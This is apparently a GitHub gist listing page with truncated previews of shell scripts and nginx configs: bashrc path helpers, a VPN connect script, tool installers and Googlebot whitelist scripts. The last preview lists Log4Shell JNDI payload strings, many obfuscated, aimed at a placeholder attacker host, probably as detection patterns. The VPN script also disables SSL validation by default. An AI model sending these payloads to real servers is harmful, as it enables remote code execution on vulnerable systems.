This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
logbashrc() { | |
[[ $- =~ i ]] && echo "$1" | |
return 0 | |
} | |
pathadd() { | |
local option="" | |
local retval=0 | |
if [[ "${1:0:1}" = "-" ]]; then | |
option=$1 && shift |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# May be required to avoid SSL certificate validation. | |
# NOTE: manually validate the CA in this case. | |
export INSECURE=${INSECURE:-true} | |
# Set to user id for access: | |
OPENCONNECT_USER="USERNAME" | |
# Set to server without scheme, use what's configured in client config: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
logbashrc() { | |
(( INTERACTIVE )) && echo "$1" | |
return 0 | |
} | |
pathdedup() { | |
local retval=0 | |
local opt= dir= deduped= | |
# default to PATH |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
ARCH=$(uname -m) | |
TEMPDIR=/tmp | |
echo "Installing some python packages..." | |
python --version | |
python -m pip install azure-cli | |
python -m pip install ansible |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
TEMPDIR=$(mktemp -d) | |
pushd "${TEMPDIR}" | |
[ ! -d "$HOME/bin" ] && mkdir -p "$HOME/bin" | |
echo "Installing homebrew..." | |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
stream { | |
# Set resolver to a name server that can resolve the domain | |
# for the zone_sync_server DNS to all webtier IPs. | |
resolver 10.0.0.1; | |
server { | |
listen 9443 reuseport; | |
zone_sync; | |
zone_sync_server api.prod.int.example.com:9443 resolve; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# update-googlebot-whitelist-keyval.sh | |
# | |
# | |
# Cron daily with this format: | |
# 0 0 * * * /usr/local/bin/update-googlebot-whitelist-keyval.sh &>/dev/null | |
# Check for dependencies, this process requires curl and jq: | |
if ! type -P curl &>/dev/null; then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# whitelist.conf | |
# Geo maps that build a $whitelist map variable. | |
# | |
# NOTES | |
# * This relies on an $is_google geo map set in a separate .conf file. | |
# * Update $remote_addr used in the maps to a variable that holds the | |
# real client IP address, or set a proxy configuration in the geo | |
# map. See the documentation for guidance. | |
# * Using $remote_addr in geo maps is not required and is the default | |
# variable used in the lookup. If setting a proxy configuration in |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# generate-nginx-googlebot-whitelist.sh | |
# | |
# Cron daily with this format: | |
# 0 0 * * * /usr/local/bin/generate-nginx-googlebot-whitelist.sh reload &>/dev/null | |
# Update GOOGLE_WHITELIST_CONF to point to a configuration file that is included | |
GOOGLE_WHITELIST_CONF="/etc/nginx/conf.d/google-whitelist.conf" | |
# Update RELOAD_CMD with the command used to reload the nginx configuration |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
declare -a PATTERNS=() | |
PATTERNS+=('${jndi:ldap:attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${j${k8s:k5:-ND}i${sd:k5:-:}}') | |
PATTERNS+=('${j${main:\k5:-Nd}i${spring:k5:-:}}') | |
PATTERNS+=('${j${sys:k5:-nD}${lower:i${web:k5:-:}}}') | |
PATTERNS+=('${j${::-nD}i${::-:}}') | |
PATTERNS+=('${j${EnV:K5:-nD}i:}') | |
PATTERNS+=('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}attacker_controled_website/payload_to_be_executed}') | |
PATTERNS+=('${j${loWer:Nd}i${uPper::}}') | |
PATTERNS+=('${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controled_website/payload_to_be_executed }') |
NewerOlder